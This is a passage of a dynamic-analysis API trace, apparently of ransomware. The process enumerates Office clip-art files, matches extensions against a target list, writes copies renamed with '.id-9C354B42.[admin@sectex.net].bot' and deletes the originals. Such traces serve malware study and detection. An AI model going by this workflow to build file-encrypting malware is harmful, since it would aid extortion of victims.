	[0155.911] lstrlenW (lpString=".xls") returned 4
	[0155.911] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0155.911] lstrlenW (lpString=".xlsx") returned 5
	[0155.911] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0155.911] lstrlenW (lpString=".ppt") returned 4
	[0155.911] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0155.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102762.WMF") returned 63
	[0155.911] lstrlenW (lpString=".zip") returned 4
	[0155.911] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0155.911] lstrlenW (lpString=".rar") returned 4
	[0155.911] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0155.911] lstrlenW (lpString=".bz2") returned 4
	[0155.911] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0155.911] lstrlenW (lpString=".7z") returned 3
	[0155.911] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0155.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102762.WMF") returned 63
	[0155.911] lstrlenW (lpString=".dbf") returned 4
	[0155.912] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0155.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102762.WMF") returned 63
	[0155.912] lstrlenW (lpString=".1cd") returned 4
	[0155.912] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0155.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102762.WMF") returned 63
	[0155.912] lstrlenW (lpString=".jpg") returned 4
	[0155.912] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0155.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102762.WMF") returned 63
	[0155.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102762.WMF") returned 63
	[0155.912] lstrlenW (lpString=".doc") returned 4
	[0155.912] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0155.912] lstrlenW (lpString=".docx") returned 5
	[0155.912] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0155.912] lstrlenW (lpString=".pdf") returned 4
	[0155.912] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0155.912] lstrlenW (lpString=".xls") returned 4
	[0155.912] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0155.912] lstrlenW (lpString=".xlsx") returned 5
	[0155.912] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0155.912] lstrlenW (lpString=".ppt") returned 4
	[0155.912] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0155.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102762.WMF") returned 63
	[0155.912] lstrlenW (lpString=".zip") returned 4
	[0155.912] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0155.912] lstrlenW (lpString=".rar") returned 4
	[0155.912] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0155.912] lstrlenW (lpString=".bz2") returned 4
	[0155.912] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0155.912] lstrlenW (lpString=".7z") returned 3
	[0155.912] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0155.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102762.WMF") returned 63
	[0155.913] lstrlenW (lpString=".dbf") returned 4
	[0155.913] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0155.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102762.WMF") returned 63
	[0155.913] lstrlenW (lpString=".1cd") returned 4
	[0155.913] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0155.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102762.WMF") returned 63
	[0155.913] lstrlenW (lpString=".jpg") returned 4
	[0155.913] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0155.913] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0155.913] lstrlenW (lpString="J0103402.WMF") returned 12
	[0155.913] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103402.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103402.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0155.930] GetFileSizeEx (in: hFile=0x268, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=44948) returned 1
	[0155.930] CloseHandle (hObject=0x268) returned 1
	[0155.930] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103402.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103402.wmf")) returned 0x20
	[0155.941] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103402.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103402.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.941] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103402.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103402.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0155.942] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.942] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.942] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103402.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103402.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0155.942] GetLastError () returned 0x0
	[0155.942] ReadFile (in: hFile=0x388, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0xaf94, lpOverlapped=0x0) returned 1
	[0156.002] WriteFile (in: hFile=0x1b8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xafa0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xafa0, lpOverlapped=0x0) returned 1
	[0156.004] ReadFile (in: hFile=0x388, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.005] WriteFile (in: hFile=0x1b8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0156.005] SetEndOfFile (hFile=0x1b8) returned 1
	[0156.005] CloseHandle (hObject=0x1b8) returned 1
	[0156.005] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.005] SetEndOfFile (hFile=0x388) returned 1
	[0156.063] CloseHandle (hObject=0x388) returned 1
	[0156.063] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103402.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.282] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103402.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103402.wmf")) returned 1
	[0156.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103402.WMF") returned 63
	[0156.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103402.WMF") returned 63
	[0156.283] lstrlenW (lpString=".doc") returned 4
	[0156.283] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0156.283] lstrlenW (lpString=".docx") returned 5
	[0156.283] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0156.283] lstrlenW (lpString=".pdf") returned 4
	[0156.283] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0156.283] lstrlenW (lpString=".xls") returned 4
	[0156.283] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0156.283] lstrlenW (lpString=".xlsx") returned 5
	[0156.283] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0156.283] lstrlenW (lpString=".ppt") returned 4
	[0156.283] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0156.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103402.WMF") returned 63
	[0156.283] lstrlenW (lpString=".zip") returned 4
	[0156.283] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0156.283] lstrlenW (lpString=".rar") returned 4
	[0156.283] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0156.283] lstrlenW (lpString=".bz2") returned 4
	[0156.284] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0156.284] lstrlenW (lpString=".7z") returned 3
	[0156.284] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0156.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103402.WMF") returned 63
	[0156.284] lstrlenW (lpString=".dbf") returned 4
	[0156.284] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0156.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103402.WMF") returned 63
	[0156.284] lstrlenW (lpString=".1cd") returned 4
	[0156.284] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0156.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103402.WMF") returned 63
	[0156.284] lstrlenW (lpString=".jpg") returned 4
	[0156.284] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0156.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103402.WMF") returned 63
	[0156.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103402.WMF") returned 63
	[0156.284] lstrlenW (lpString=".doc") returned 4
	[0156.284] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0156.284] lstrlenW (lpString=".docx") returned 5
	[0156.284] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0156.284] lstrlenW (lpString=".pdf") returned 4
	[0156.284] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0156.284] lstrlenW (lpString=".xls") returned 4
	[0156.284] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0156.284] lstrlenW (lpString=".xlsx") returned 5
	[0156.284] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0156.284] lstrlenW (lpString=".ppt") returned 4
	[0156.284] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0156.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103402.WMF") returned 63
	[0156.284] lstrlenW (lpString=".zip") returned 4
	[0156.284] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0156.284] lstrlenW (lpString=".rar") returned 4
	[0156.284] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0156.285] lstrlenW (lpString=".bz2") returned 4
	[0156.285] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0156.285] lstrlenW (lpString=".7z") returned 3
	[0156.285] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0156.285] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103402.WMF") returned 63
	[0156.285] lstrlenW (lpString=".dbf") returned 4
	[0156.285] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0156.285] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103402.WMF") returned 63
	[0156.285] lstrlenW (lpString=".1cd") returned 4
	[0156.285] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0156.285] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103402.WMF") returned 63
	[0156.285] lstrlenW (lpString=".jpg") returned 4
	[0156.285] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0156.285] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0156.285] lstrlenW (lpString="J0105232.WMF") returned 12
	[0156.285] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105232.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105232.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0156.307] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=5632) returned 1
	[0156.307] CloseHandle (hObject=0x3ac) returned 1
	[0156.307] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105232.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105232.wmf")) returned 0x20
	[0156.317] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105232.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105232.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.328] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105232.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105232.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0156.329] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.329] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.329] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105232.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105232.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0156.330] GetLastError () returned 0x0
	[0156.330] ReadFile (in: hFile=0x25c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x1600, lpOverlapped=0x0) returned 1
	[0156.373] WriteFile (in: hFile=0x268, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x1610, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x1610, lpOverlapped=0x0) returned 1
	[0156.374] ReadFile (in: hFile=0x25c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.374] WriteFile (in: hFile=0x268, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0156.374] SetEndOfFile (hFile=0x268) returned 1
	[0156.374] CloseHandle (hObject=0x268) returned 1
	[0156.374] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.374] SetEndOfFile (hFile=0x25c) returned 1
	[0156.376] CloseHandle (hObject=0x25c) returned 1
	[0156.376] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105232.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.377] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105232.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105232.wmf")) returned 1
	[0156.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105232.WMF") returned 63
	[0156.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105232.WMF") returned 63
	[0156.377] lstrlenW (lpString=".doc") returned 4
	[0156.377] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0156.377] lstrlenW (lpString=".docx") returned 5
	[0156.377] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0156.377] lstrlenW (lpString=".pdf") returned 4
	[0156.377] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0156.377] lstrlenW (lpString=".xls") returned 4
	[0156.378] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0156.378] lstrlenW (lpString=".xlsx") returned 5
	[0156.378] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0156.378] lstrlenW (lpString=".ppt") returned 4
	[0156.378] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0156.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105232.WMF") returned 63
	[0156.378] lstrlenW (lpString=".zip") returned 4
	[0156.378] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0156.378] lstrlenW (lpString=".rar") returned 4
	[0156.378] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0156.378] lstrlenW (lpString=".bz2") returned 4
	[0156.378] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0156.378] lstrlenW (lpString=".7z") returned 3
	[0156.378] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0156.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105232.WMF") returned 63
	[0156.378] lstrlenW (lpString=".dbf") returned 4
	[0156.378] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0156.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105232.WMF") returned 63
	[0156.378] lstrlenW (lpString=".1cd") returned 4
	[0156.378] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0156.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105232.WMF") returned 63
	[0156.378] lstrlenW (lpString=".jpg") returned 4
	[0156.378] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0156.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105232.WMF") returned 63
	[0156.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105232.WMF") returned 63
	[0156.378] lstrlenW (lpString=".doc") returned 4
	[0156.378] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0156.378] lstrlenW (lpString=".docx") returned 5
	[0156.378] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0156.378] lstrlenW (lpString=".pdf") returned 4
	[0156.378] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0156.379] lstrlenW (lpString=".xls") returned 4
	[0156.379] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0156.379] lstrlenW (lpString=".xlsx") returned 5
	[0156.379] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0156.379] lstrlenW (lpString=".ppt") returned 4
	[0156.379] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0156.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105232.WMF") returned 63
	[0156.379] lstrlenW (lpString=".zip") returned 4
	[0156.379] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0156.379] lstrlenW (lpString=".rar") returned 4
	[0156.379] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0156.379] lstrlenW (lpString=".bz2") returned 4
	[0156.379] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0156.379] lstrlenW (lpString=".7z") returned 3
	[0156.379] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0156.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105232.WMF") returned 63
	[0156.379] lstrlenW (lpString=".dbf") returned 4
	[0156.379] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0156.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105232.WMF") returned 63
	[0156.379] lstrlenW (lpString=".1cd") returned 4
	[0156.379] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0156.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105232.WMF") returned 63
	[0156.379] lstrlenW (lpString=".jpg") returned 4
	[0156.379] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0156.379] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0156.379] lstrlenW (lpString="J0105246.WMF") returned 12
	[0156.379] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105246.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0156.380] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=19328) returned 1
	[0156.380] CloseHandle (hObject=0x25c) returned 1
	[0156.380] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105246.wmf")) returned 0x20
	[0156.380] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105246.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.380] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105246.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0156.380] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.381] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.381] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105246.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0156.382] GetLastError () returned 0x0
	[0156.382] ReadFile (in: hFile=0x25c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x4b80, lpOverlapped=0x0) returned 1
	[0156.438] WriteFile (in: hFile=0x268, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x4b90, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x4b90, lpOverlapped=0x0) returned 1
	[0156.439] ReadFile (in: hFile=0x25c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.439] WriteFile (in: hFile=0x268, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0156.439] SetEndOfFile (hFile=0x268) returned 1
	[0156.440] CloseHandle (hObject=0x268) returned 1
	[0156.440] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.440] SetEndOfFile (hFile=0x25c) returned 1
	[0156.442] CloseHandle (hObject=0x25c) returned 1
	[0156.442] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.459] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105246.wmf")) returned 1
	[0156.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF") returned 63
	[0156.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF") returned 63
	[0156.535] lstrlenW (lpString=".doc") returned 4
	[0156.535] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0156.535] lstrlenW (lpString=".docx") returned 5
	[0156.535] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0156.535] lstrlenW (lpString=".pdf") returned 4
	[0156.535] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0156.535] lstrlenW (lpString=".xls") returned 4
	[0156.535] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0156.535] lstrlenW (lpString=".xlsx") returned 5
	[0156.536] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0156.536] lstrlenW (lpString=".ppt") returned 4
	[0156.536] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0156.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF") returned 63
	[0156.536] lstrlenW (lpString=".zip") returned 4
